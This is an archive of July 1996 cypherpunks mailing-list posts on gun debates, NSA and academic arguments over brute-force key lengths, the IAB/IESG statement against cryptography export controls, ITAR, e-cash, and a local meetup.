tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Jul 1996 15:43:16 +0800
To: cypherpunks@toad.com
Subject: RE: [Noise] was Re: Giving 6 year old kids Uzi's
Message-ID: <ae1afdb008021004ba66@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:54 PM 7/23/96, Bill Olson (EDP) wrote:

>I find nothing wrong with plinking. Hell, I'm from Montana--we used to
>go shooting all the time. But when the shooting was done, the guns were
>put away. What I find disturbing is that a child is taking it to school,
>or just carrying it around. I say that any parent who thinks their child
>is mature enough to carry a gun for non-recreational reasons is less
>mature than the child. In fact, I'd go so far as to say they are a
>danger to their own children.
>
>I guess I don't really have to worry too much, though. It is illegal for
>children to possess such items publicly, and any parent who condones it
>is simply breaking the law. I don't blame the child, I blame the moronic
>parent who let's it happen.

I'm _still_ missing the reference here? Just who *seriously* is proposing
that 6-year-old children carry guns to school?

(I emphasize "seriously* because there is a big difference between
seriously proposing this and obviously making a joke, a la "I say we issue
them guns after a basic safety class in Kindergarten." And I think
someone's (maybe Brad Dolan's, if I remember correctly) point that his
daughter carries a gun at school was followed immediately by mention that
she is home-schooled, i.e., at his home.)

I can imagine certain circumstances in which children could be
armed--attacking terrorists on a ranch, Indians, etc.--but no public school
in the United States, and probably not any private schools (K-12), allow
loaded guns to be carried to schools.

I'd love to see this "stupid gun thread" (to use Ernest Hua's term) die,
but it keeps living on because some here are mischaracterizing the claims
of others.

Look, handing out guns to kids playing cops and robbers at age 6 or 8 or
even 10 is probably a bad idea, but training kids at even a very young age
to respect guns and to understand their dangers and limitations--and their
advantages--is proably a good idea. In any case, the hoplophobia of some
parents is not adequate reason to stop other parents from training their
children under carefully controlled conditions.

Getting a carry permit is not easy in any state in the U.S., so the fears
that 6-year-olds are openly carrying guns to public schools is unfounded.

(Young kids carrying guns to schools _secretly_ is of course a problem.
Many of them carry crude guns out of fear that other kids are carrying
guns. The proper solution for a kid committing a serious crime with a gun
is to severely punish the child--I see no reason why a 14-year-old who
murders someone should not get the brand of justice I favor, namely, a fair
trial, no appeal except on substantive grounds, and a quick execution if
determined to be guilty of first degree murder.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: farber@central.cis.upenn.edu
Date: Fri, 26 Jul 1996 16:09:54 +0800
To: cypherpunks@toad.com
Subject: IP: NSA RESPONSE TO KEY LENGTH REPORT
Message-ID: <21a.193396.40@iac-online.com>
MIME-Version: 1.0
Content-Type: text/plain


Message-ID: <2.2.32.19960718184201.0070667c@linc.cis.upenn.edu>

Date: Thu, 18 Jul 1996 12:04:27 -0400
From: Matt Blaze <mab@research.att.com>

July 18, 1996

There is currently being circulated, to members of Congress and
possibly elsewhere, a four page document entitled ``Brute-Force
Cryptanalytic Attacks'' that calls into question some of the
conclusions of the ``Minimum Key Lengths for Symmetric Ciphers'' white
paper [1].  The document bears no author or organization attribution,
but we are told that it originated from NSA.

The NSA document argues that ``physical realities'' make parallel key
search much more expensive and time consuming than our white paper
estimated.  However, the NSA document appears to have been written
from the perspective of general parallel processing or cryptanalysis
rather than exhaustive key search per se.  It ignores several
elementary principles of parallel processing that apply specifically
to exhaustive key search machines of the type that our white paper
considered.

In particular, NSA argues that interconnections, heat dissipation,
input/output bandwidth, and interprocessor communication make it
difficult to ``scale up'' a key search machine by dividing the task
among a large number of small components.  While these factors do
limit the scalability of more general purpose multiprocessor computers
(such as those made by Cray), they do not apply at all to specialized
exhaustive key search machines.  The NSA argument ignores the most
fundamental feature of brute-force key search: the processors
performing the search have no need to communicate with other
components of the system while they perform their share of the search,
and therefore the system has no need for any of the global
interconnections that limit scaling.  Indeed, there is no reason that
all the components of a parallel search machine must be located even
within the same city, let alone the same computer housing.  We note
that one of our co-authors (Eric Thompson, of Access Data, Inc.)
designs and builds medium-scale FPGA-based key search machines with
exactly this loosely-coupled structure, and regularly uses them to
recover keys for clients that include the FBI.

The NSA document also calls into question our cost estimates for ASIC
components, suggesting that ASIC chips of this type cost NSA
approximately $1000.00 each.  However, our $10.00 per chip estimate is
based on an actual price quote from a commercial chip fabrication
vendor for a moderate-size order for an exhaustive search ASIC
designed in 1993 by Michael Wiener [2].  Perhaps NSA could reduce its
own costs by changing vendors.

Finally, the NSA report offers estimates of the time required to
perform exhaustive search using a Cray model T3D supercomputer.  This
is a curious choice, for as our report notes, general-purpose
supercomputers of this type make poor (and uneconomical) key search
engines.  However, even the artificially low performance results for
this machine should give little comfort to the users of 56 bit keys.
According to NSA, 56 bit keys can be searched on such a machine in
less than 453 days.  ``Moore's law'' predicts that it will not be long
before relatively inexpensive general-purpose computers offer similar
computational capability.

/s/  Matt Blaze
     Whitfield Diffie

References:

[1] Blaze, M., Diffie, W., Rivest, R., Schneier, B., Shimomura, T.,
    Thompson, E., and Wiener, M.  ``Minimum Key Lengths for Symmetric
    Key Ciphers for Commercial Security.''  January 1996.  Available
    from ftp://ftp.research.att.com/dist/mab/keylength.txt

[2] Wiener, M.  ``Exhaustive DES Key Search.''  Presented at
    Crypto-93, Santa Barbara, CA.  August 1993.

=========================================================================
[Transcription of document circulated to various members of congress
and others in June, 1996, apparently by NSA]

BRUTE-FORCE CRYPTANALYTIC ATTACKS

Two published theoretical estimates of cost versus time to perform
brute-force hardware attacks on selected cryptography key lengths
differ between themselves and differ significantly from what we find
when we buy or build computers to carry out such attacks.

The differences lie in assumptions made in the theoretical estimates,
which are not fully spelled out by the authors, and in scaling up
hypothesized small machines to ever larger ones without accounting for
physical realities.

The factors not accounted for are:

  o R&D costs for the first machine, typically on the order of $10
    million.

  o As more and more chips are added to a machine, two effects occur:

      o Interconnections increase and increase running time;
      o Heat from the chips eventually limit [sic] the size of a
        machine.

  o Memory costs are not included.

  o When get [sic] to the very fast processing speed estimates,
    machines can become Input/Output bound; so [sic] it cannot achieve
    the estimated speed.

  o Assuming every algorithm can be tested in same amount of time and
    key length is the only difference.

Table 1 are [sic] the average time estimates made for a given cost
done by Michael Wiener of Bell Norther Research in 1995.  These are
published in Bruce Schneier's Applied Cryptography book.

Note that these are average times, one-half of the total exhaust time.

Table 2 are [sic] the estimates for total exhaust times using Field
Programmmable Gate Arrays (FPGA) and Application Specific ICs (ASICs)
done for the Business Software Alliance by Blaze, Diffie, Rivest,
Schneier, Shimomura, Thompson, and Wiener in 1996.  In addition to the
above factors not accounted for they have assumed ASICs cost as low as
$10.  We find ASICs more typically cost $1000 and their capabilities
can vary considerably depending upon the specific task.

Table 3 are out estimates based on our experience with a Cray T3D
supercomputer with 1024 nodes.  This machine costs $30 million.

[Tables 1, 2, and 3 not transcribed here.]








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 26 Jul 1996 05:41:52 +0800
To: dlv@bwalk.dm.com
Subject: Re: Filtering out Queers is OK
Message-ID: <9607222001.AA09555@mailman.>
MIME-Version: 1.0
Content-Type: text/plain


Several folks said, ad nauseum:
>Please don't respond to Steinlight's spam - thank you...
(ans serveral variants)

For a group who claims to defend the rights to speak and 
associate, etc, we seem to be wasting a lot of energy
lately telling each other who we should talk to and
associate with.  I figure I can decide for myself.
Repeating your advice won't sway me.  Probably won't
sway most of us.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 25 Jul 1996 00:56:40 +0800
To: cypherpunks@toad.com
Subject: Re: Special Agent Safdar
Message-ID: <199607241244.FAA06695@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Metzger writes:
> Anonymous writes:
> > FBI Special Agent Safdar is upset enough by the revelation
> > of his true identity to issue a quick denial (on a sunday night, to get
> > more OT no doubt), but he doesn't even bother to try to refute the
> > central truth that his cover has been blown by a careless operator at
> > his home office who verified his employment and offered to take a message
> > for him.
>
> You really are on drugs. The question is, which ones?

It could only be Ritalin, the Official Non-Stimulant of the Cypherpunks list.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 25 Jul 1996 03:09:20 +0800
To: cypherpunks@toad.com
Subject: RE: No more stupid gun thread ...
In-Reply-To: <c=US%a=_%p=msft%l=RED-16-MSG-960723232151Z-37234@tide21.microsoft.com>
Message-ID: <wukkRD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Bill Olson (EDP)" <a-billol@microsoft.com> writes:

> Alan Horowitz writes:
> >
> >How _can_ anyone say that "stupid guns" is ready for the trash-heap of
> >history?   No one has called anyone a Nazi yet!
>
> I agree.
> >

OK - "Dr." David Sternlight is a Nazi.

          Down with the Usenet Cabal! All power to the GruborBots!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@issl.atl.hp.com>
Date: Thu, 25 Jul 1996 01:28:18 +0800
To: cypherpunks@toad.com (Cypherpunks List)
Subject: [forwarded message]: IAB/IESG statement on cryptography (fwd)
Message-ID: <199607241232.IAA07860@jafar.issl.atl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain



Subject: IAB/IESG statement on cryptography
To: ietf@ietf.org
Date: Wed, 24 Jul 1996 08:21:59 +0200 (MET DST)
From: Brian Carpenter CERN-CN <brian@dxcoms.cern.ch>

IETF,

FYI, the IAB and IESG have just requested the Internet Society
to release the attached statement to the press on our behalf.
(The copyright tag at the end is purely to protect the text
against misuse.)

We intend to publish this as an informational RFC for the record.

   Brian Carpenter

- ---

IAB and IESG statement on cryptographic technology and the Internet
- -------------------------------------------------------------------

July 24, 1996

The Internet Architecture Board (IAB) and the Internet Engineering
Steering Group (IESG), the bodies which oversee architecture and
standards for the Internet, are concerned by the need for increased
protection of international commercial transactions on the Internet,
and by the need to offer all Internet users an adequate degree of
privacy.

Security mechanisms being developed in the Internet Engineering
Task Force to meet these needs require and depend on the international
use of adequate cryptographic technology.  Ready access to such
technology is therefore a key factor in the future growth of the
Internet as a motor for international commerce and communication.

The IAB and IESG are therefore disturbed to note that various
governments have actual or proposed policies on access to cryptographic
technology that either:
(a) impose restrictions by implementing export controls; and/or
(b) restrict commercial and private users to weak and inadequate
mechanisms such as short cryptographic keys; and/or
(c) mandate that private decryption keys should be in the hands of
the government or of some other third party; and/or
(d) prohibit the use of cryptology entirely, or permit it only
to specially authorized organizations.

We believe that such policies are against the interests of consumers
and the business community, are largely irrelevant to issues of
military security, and provide only a marginal or illusory benefit
to law enforcement agencies, as discussed below.

The IAB and IESG would like to  encourage policies that allow ready
access to uniform strong cryptographic technology for all Internet
users in all countries.

The IAB and IESG claim:

The Internet is becoming the predominant vehicle for electronic
commerce and information exchange. It is essential that the support
structure for these activities can be trusted.

Encryption is not a secret technology monopolized by any one country,
such that export controls can hope to contain its deployment. Any
hobbyist can program a PC to do powerful encryption. Many algorithms
are well documented, some with source code available in textbooks.

Export controls on encryption place companies in that country at
a competitive disadvantage. Their competitors from countries without
export restrictions can sell systems whose only design constraint
is being secure, and easy to use.

Usage controls on encryption will also place companies in that
country at a competitive disadvantage because these companies cannot
securely and easily engage in electronic commerce.

Escrow mechanisms inevitably weaken the security of the overall
cryptographic system, by creating new points of vulnerability that
can and will be attacked.

Export controls and usage controls are slowing the deployment of
security at the same time as the Internet is exponentially increasing
in size and attackers are increasing in sophistication. This puts
users in a dangerous position as they are forced to rely on insecure
electronic communication.


TECHNICAL ANALYSIS
- --------------------------

KEY SIZE 

It is not acceptable to restrict the use or export of cryptosystems
based on their key size.  Systems that are breakable by one country
will be breakable  by others, possibly unfriendly ones.  Large
corporations and even criminal enterprises have the resources to
break many cryptosystems.  Furthermore, conversations often need
to be protected for years to come; as computers increase in speed,
key sizes that were once out of reach of cryptanalysis will become
insecure.


PUBLIC KEY INFRASTRUCTURE

Use of public key cryptography often requires the existence of a
"certification authority".  That is, some third party must sign a
string containing the user's identity and public key.  In turn,
the third party's key is often signed by a higher-level certification
authority.

Such a structure is legitimate and necessary.  Indeed, many
governments will and should run their own CAs, if only to protect
citizens' transactions with their governments.  But certification
authorities should not be confused with escrow centers.  Escrow
centers are repositories for private keys, while certification
authorities deal with public keys. Indeed, sound cryptographic
practice dictates that users never reveal their private keys to
anyone, even the certification authority.


KEYS SHOULD NOT BE REVEALABLE

The security of a modern cryptosystem rests entirely on the secrecy
of the keys.  Accordingly, it is a major principle of system design
that to the extent possible, secret keys should never leave their
user's secure environment.  Key escrow implies that keys must be
disclosed in some fashion, a flat-out contradiction of this principle.
Any such disclosure weakens the total security of the system.

DATA RECOVERY

Sometimes escrow systems are touted as being good for the customer
because they allow data recovery in the case of lost keys. However,
it should be up to the customer to decide whether they would prefer
the more secure system in which lost keys mean lost data, or one
in which keys are escrowed to be recovered when necessary.  Similarly,
keys used only for conversations (as opposed to file storage) need
never be escrowed.  And a system in which the secret key is stored
by a government and not by the data owner is certainly not practical
for data recovery.

SIGNATURE KEYS

Keys used for signatures and authentication must never be escrowed.
Any third party with access to such keys could impersonate the
legitimate owner, creating new opportunities for fraud and deceit.
Indeed, a user who wished to repudiate a transaction could claim
that his or her escrowed key was used, putting the onus on that
party.  If a government escrowed the keys, a defendant could claim
that the evidence had been forged by the government, thereby making
prosecution much more difficult.  For electronic commerce,
non-repudiation is one of the most important uses for cryptography;
and non-repudiation depends on the assumption that only the user
has access to the private key.

PROTECTION OF THE EXISTING INFRASTRUCTURE

In some cases, it is technically feasible to use cryptographic operations
that do not involve secrecy.  While this may suffice in some cases, much
of the existing technical and commercial infrastructure cannot be
protected in this way.  For example, conventional passwords, credit
card numbers, and the like must be protected by strong encryption,
even though some day more sophisticated techniques may replace them.
Encryption can be added on quite easily; wholesale changes to diverse
systems cannot.

CONFLICTING INTERNATIONAL POLICIES

Conflicting restrictions on encryption often force an international
company to use a weak encryption system, in order to satisfy legal
requirements in two or more different countries.  Ironically, in
such cases either nation might consider the other an adversary
against whom commercial enterprises should use strong cryptography.
Clearly, key escrow is not a suitable compromise, since neither
country would want to disclose keys to the other.

MULTIPLE ENCRYPTION

Even if escrowed encryption schemes are used, there is nothing to
prevent someone from using another encryption scheme first.  Certainly,
any serious malefactors would do this; the outer encryption layer,
which would use an escrowed scheme, would be used to divert suspicion.


ESCROW OF PRIVATE KEYS WON'T NECESSARILY ALLOW DATA DECRYPTION

A major threat to users of cryptographic systems is the theft of
long-term keys (perhaps by a hacker), either before or after a
sensitive conversation.  To counter this threat, schemes with
"perfect forward secrecy" are often employed.  If PFS is used, the
attacker must be in control of the machine during the actual
conversation.  But PFS is generally incompatible with schemes
involving escrow of private keys.  (This is an oversimplification,
but a full analysis would be too lengthy for this document.)



CONCLUSIONS
- --------------------------

As more and more companies connect to the Internet, and as more and
more commerce takes place there, security is becoming more and more
critical.  Cryptography is the most powerful single tool that users
can use to secure the Internet. Knowingly making that tool weaker
threatens their ability to do so, and has no proven benefit.

- ----
The Internet Architecture Board is described at http://www.iab.org/iab

The Internet Engineering Task Force and the Internet Engineering
Steering Group are described at http://www.ietf.org

- ----
(C) Internet Society 1996. Reproduction or translation of the
complete document, but not of extracts, including this notice,
is freely permitted.

(ends)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: moulton@netcom.com (Fred C. Moulton)
Date: Thu, 25 Jul 1996 02:54:05 +0800
To: cypherpunks@toad.com
Subject: Pachinko Cards in WSJ
Message-ID: <199607241541.IAA23381@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



The July 24 1996 edition of the Wall Street Journal has a front page article
about the "cashless Pachinko cards" in Japan which resulted in losses for
several businesses.  This was discussed in cypherpunks when the story 
originally broke months ago.  The article in the WSJ relates how the cards
were the results of fears that the money laundered from the pachinko halls
was being sent to North Korea to fund the nuclear program there.  The CIA
provided intelligence about this to the Japanese authorities according to
the article.  Far too many details to summarize here, I suggest those who
are interested read it.

Fred




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Thu, 25 Jul 1996 04:17:05 +0800
To: "'pjn@nworks.com>
Subject: RE: Brute-forcing DES
Message-ID: <01BB7946.4C886760@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



Count me in:
Good reason to get the XT (!!!!!!) and the 12Mhz Vendex286 out of the garage ... 
We can throw in the Mac too if the code's portable.
And the 486-100.
And you can have McArthur, the P-133, after bedtime.
And the 486-20 portable, why not?
I'm also available for assembler coding/optimizing on a limited basis.
Excellent project!

On Tue, 23 Jul 1996 pjn@nworks.com wrote:

> Date: Tue, 23 Jul 1996 16:25:44 -0500 
> From: pjn@nworks.com
> To: cypherpunks@toad.com
> Subject: Brute-forcing DES
> 
>  > Any one up for a distributed brute force attack on single DES? My 
>  > back-of-the-envelope calculations and guesstimates put this on the
>  > hairy edge of doability (the critical factor is how many machines can
>  > be recruited - a non-trivial cash prize would help). 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alex F" <alexf@iss.net>
Date: Thu, 25 Jul 1996 01:54:36 +0800
To: molecul1@molecule1.com (Molecule One Scientific Research Institute)
Subject: Re: A Global Village; an open letter to Bill & Hill [rant]
Message-ID: <199607241359.JAA19454@phoenix.iss.net>
MIME-Version: 1.0
Content-Type: text/plain



>  The world is everchanging and Mrs. Clinton is correct in that the
> industrialized
> countries have lost, most, of their extended families. This makes children
> vulnerable to danger.

This is such crap, and I'll tell you why.  It is a classic example of 
political double speak.  Here Hillary says that children are in 
danger because of lost family values.  Absolutely true.  Let me ask 
you then why is it that Bill(ary) signed an unconstitutional law?  I 
am referring to the CDA and the telephony bill.  What about the 
terrorism bill?  They apparently support censorship on the Internet.  
They don't want "bigtitties.gif" on the net and accessable to little 
Johnny.  They say that it is WRONG for little Johhny to have access 
to "bigtitties.gif," and that the GOVERNMENT should DO SOMETHING 
about this.  What happened to family values?  Just HOW the hell can 
you support and promote family values when you are telling the 
parents (who you want to pay more attention to their children, get 
more involved, and be kinder) "WE know what is best for little 
Johnny, and WE will make the decisions, NOT YOU"  To me this sends a 
message of "The government knows best because most parents are stupid 
and uncaring."  

It is much more likely that little Johnny will go over to Sammy's 
house and look at the Playboys that Sammy's dad has hidden under the 
bed than collect nudie .gifs off of the net, but they wouldn't dare 
censor that.  The Internet is another story, however.  I got news for 
them, we had pornography LONG before the net ever existed, and there 
is NO solid psychological link to viewing porn and becoming a sex 
offender.  Anyone who thinks so needs to realize that they are 
talking about something about which they have no clue.

Anyway, getting off-topic again.  I'll be quiet now :)

Alex F
=-=-=-=-=-=-=-=-=-=-=-=-=-
Alex F    alexf@iss.net
Marketing Specialist
Internet Security Systems
=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Robichaux <paul@ljl.COM>
Date: Thu, 25 Jul 1996 03:01:18 +0800
To: cypherpunks@toad.com
Subject: Re: E-Cash promotion idea
In-Reply-To: <199607241015.FAA06111@Dusk.obscure.net>
Message-ID: <v03007800ae1bed59f1b1@[206.151.234.126]>
MIME-Version: 1.0
Content-Type: text/plain


Matt Carpenter said:
>What if we just forget about change?  One of the neat things about ecash is
>that it allows for coins of (fairly) arbitrary values.  We can use this to
>our advantage, since we can guarantee that we can make a single payment of
>any value with a small number of coins.

The Visa stored-value cards now in Atlanta don't do this, but as a
simplifying measure most vendors in the Olympic Village (and many within
the downtown venue ring) have rounded prices to the nearest US$.
The precedent's been set.

-Paul

--
Paul Robichaux		LJL Enterprises, Inc.
paul@ljl.com		Be a cryptography user. Ask me how.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 25 Jul 1996 05:16:53 +0800
To: Gary Howland <tcmay@got.net>
Subject: Re: Digital Watermarks (long, getting off-topic)
Message-ID: <199607241726.KAA00302@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:14 PM 7/24/96 +0200, Gary Howland wrote:
>Timothy C. May wrote:
> 
>> Pre-recorded DAT tapes were available for a while...they did not sell. I
>> believe this was because DAT machine purchasers were sophisticated and new
>> how to make CD-to-DAT copies, with or without SCMS.
>
>Don't forget that pre-recorded DAT tapes are at least an order of
>magnitude more expensive to manufacture than CDs. 

Isn't it odd that when music is sold, CD's are MORE expensive than cassette 
tapes, even though you _know_ that the manufacturing cost of CD's is less?

Another oddity:  The price for a blank, standard-quality videocassette is 
about the same as that of a blank, standard-quality audio cassette tape, 
despite the fact that the volume of tape included in the former is probably 
about a factor of 10 higher.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@ARC.unm.EDU>
Date: Thu, 25 Jul 1996 04:38:03 +0800
To: Scott Schryvers <hua@chromatic.com>
Subject: Re: Kids and Computer Privacy Was  Re: No more stupid gun thread  ...
Message-ID: <1.5.4.16.19960724164258.0b775f04@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 03.48 AM 7/24/96 -0500, Scott Schryvers wrote:

>Should kids have crypto? [weapons]

Your analogy fails when I consider the simple point that crypto is not
a weapon in and of itself, no matter what the misguided ITAR says.
"... two plus two make five ..."

>Under Itar crypto is a weapon.  If a kid were to bring a disk
>containing pgp to school could they be expelled for carrying a weapon?

No, because crypto, *by itself* does NOT present a threat to any other
kid or to any teacher or to the kid carrying the code.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfZR5hguzHDTdpL5AQHqsgP5AcEWBP0SeGCWwgOKGgDVuzz4yJRXk218
lSepjhxa+OnK6Aw5Gxk/+ykJAZM++VPH4LKR3ztRP5X3CJMC8zJ+f4qatmqzRptU
yKagSL8yF2/xN9ltwJcl6T3F4f88LJKD0vDpp4M+FeIX90zDosxPl0TYYv3niG2u
v2ePUFTwWKI=
=IlGz
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@galaxy.galstar.com (Igor Chudov)
Date: Thu, 25 Jul 1996 03:27:37 +0800
To: cypherpunks@toad.com
Subject: Brute Force attack Question
Message-ID: <199607241550.KAA00886@galaxy.galstar.com>
MIME-Version: 1.0
Content-Type: text


Hello,

I've been thinking about brute force attacks, and there is something
that I do not understand. Maybe someone could explain me where I am
wrong.

Suppose Alice sends letters to BoB, and they always exchange plain 
text ASCII data. Suppose also that they use DES for encryption.
They are afraid that Perry intercepts their messages and tries to brute
force their DES key.

Perry has 100,000 computers (and 20,000 couriers alone:) and his brute
force attacks are as follows: he tries all keys in succession, looks at
the decrypted texts, and *if* the decrypted text looks like a potential
message (has only ASCII characters for example) he looks at that key closer
as it is likely that he has found the right key.

What is Alice and Bob decide to obscure their letters and add random
NON-ASCII  characters at random places? They may agree to just ignore
all non-ASCII characters, so these characters would never change the
meaning of their letters. If they do that, Perry does not have any easy
way to tell whether he really recovered the right plaintext or not, because
even correct key would still produce a lot of non-ASCII characters.

If percentage of ASCII characters in all 256 byte space is 40%, Alice
and Bob may agree to put in junk characters to make up exactly 60% of
the message. This way messages will look like random character data.

Is there any good method for attackers to circumvent this obscurity?
What is the general method to make a judgment whether the recovered
text really is a plain text if Alice and Bob noisify their letters?

I can think of this: we sift through all recovered plaintexts and remove
all non-ASCII bytes, and then do some simple testing to see whether
the remaining ASCII data resembles normal English texts. This kind
of testing seems to be quite expensive though, compared to just testing
for ASCII vs. non-ascii bytes. Anything else I am missig?

Thanks.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 25 Jul 1996 05:40:57 +0800
To: The Deviant <tomw@netscape.com>
Subject: Re: Netscape
Message-ID: <199607241752.KAA02103@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:00 PM 7/23/96 +0000, The Deviant wrote:

>On Mon, 22 Jul 1996, Tom Weinstein wrote:

>> Also, notice the simple verification system MIT was allowed to use, and
>> the complex one we're required to use.
>> 
>
>I'm curious, exactly whop is it that _required_ you to use that system.?


Excellent point.  There's a difference (or, at least, there had BETTER BE a 
difference!) between following the laws and "doing everything the government 
wants, exactly the way it wants."  It would be interesting to see the 
specific explanation which was given Netscape as to why they were required 
(if, indeed, they were required...) to use a specific system.  

It seems to me that a far more productive stance by Netscape would have been 
to say to the State Department, "We're going to put this software on the 
'net.  We're happy to put in any precautions which are SPECIFICALLY required 
under law and/or ITAR.  However, we insist that you document the fact that 
they are required, with full and complete legal explanations for your 
assertions.  Moreover, we insist that you explain why this position is 
consistent with MIT's posting of PGP."

At the very least, this would have set the government's position WRT ITAR in 
stone,  Part of the reason the governemnt has gotten so much 'mileage' out 
of ITAR is the fact that they morph it to do whatever they want, whenever 
they  want.  The best way to fight this is to tie down their position.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: samantha@gamespot.com
Date: Thu, 25 Jul 1996 06:09:58 +0800
Subject: GameSpot's $20,000 Games Contest
Message-ID: <199607241110.LAA14940@gamespot.com>
MIME-Version: 1.0
Content-Type: text/plain


Fellow gamer:

You're receiving this e-mail because we thought you might be
interested in checking out the newest, hottest games site on the
Web - GameSpot. Located at http://www.gamespot.com, GameSpot offers
more up-to- date reviews of PC games, online games, PC gaming
hardware, and VR gear than any other information source.

As an incentive to visit GameSpot, we're hosting a $20,000 games
giveaway from June 10 - August 3. Every day, we're giving away up
to $700.00 worth of games and VR gear, and, at the end of the
contest, we're giving away a colossal package of $5,000 in games
loot to one lucky winner. The more times you enter the daily contest,
the more chances you have to win the big prize! Last month, over
300 people won prizes...  make sure your name is on the list!

What makes GameSpot different, though, is the quality and quantity
of information: You can read reviews of over 140 games on the
market, check out previews of what's coming, download the best
demos, get hints on your favorite games, and link to thousands of
other sites related to gaming. If you don't like what we say about
a game or hardware product, you can submit your own review and get
published in front of an international audience. Best of all,
GameSpot is completely free! Think of the money you can save on
magazines. <grin>

We hope you'll take a moment to visit GameSpot, and we appreciate
your taking a look at our site.

Samantha Lassiter 
GameSpot
http://www.gamespot.com

P.S. This is a one-time mailing, so you will not receive further
mail from us unless you are on other mailing lists or sign up for
the GameSpot newsletter. My sincere apologies if I have intruded...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 25 Jul 1996 02:56:30 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Digital Watermarks for copy protection in recent Billbo
In-Reply-To: <ae1a71bf00021004d8f3@[205.199.118.202]>
Message-ID: <199607241517.LAA18088@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> >Not familiar with the Nyquist limit w/ regards to sampling rate vs
> >frequency :(
> 
> Check any textbook, or even a good dictionary. Basically, it says that one
> must sample at more than twice the frequency of the highest frequency to be
> reconstructed. Thus, a 20 KHz top frequency needs at least 40 K samples per
> second. The exact number is, I think, about 2.2x the freqency, which is why
> CDs were standardized at 44 K samples per second per channel.

The Nyquist Theorem states you need exactly twice the samples, not
over twice. The magic number isn't something like 2.2, its exactly
2. Now, the reality is that low pass filters in the recording studio
aren't going to be perfect and such, being analog devices, and higher
frequencies making it in will cause aliasing artifacts, so you
probably want to sample at above twice your putative cutoff because it
won't be your real cutoff, but in principle you need exactly twice the
highest frequency.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ncr.com>
Date: Thu, 25 Jul 1996 06:36:24 +0800
To: cypherpunks@toad.com
Subject: San Diego Cypherpunks Physical Meeting
Message-ID: <2.2.32.19960724154407.0070e940@opus>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, August 1st, 1996

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop" were I hope to get an update of Lance Cottrell's
anonymous e-mail server, "mixmaster", exchange keys, and discuss other
topical CP stuff.  There's always the semi-topical discussions; Internet
Service Provider in San Diego (providing, anonymous remailers and other
privacy services), stelth communications, latest Cypherpunk goings-on,
Internet happenings (like recent Federal court decision).

   Don't forget to bring your public key  fingerprint.  If you can figure
out how to get it on the back of a business card, that would be cool.  

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your key fingerprint.

Drop me a note if you plan to attend.


     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
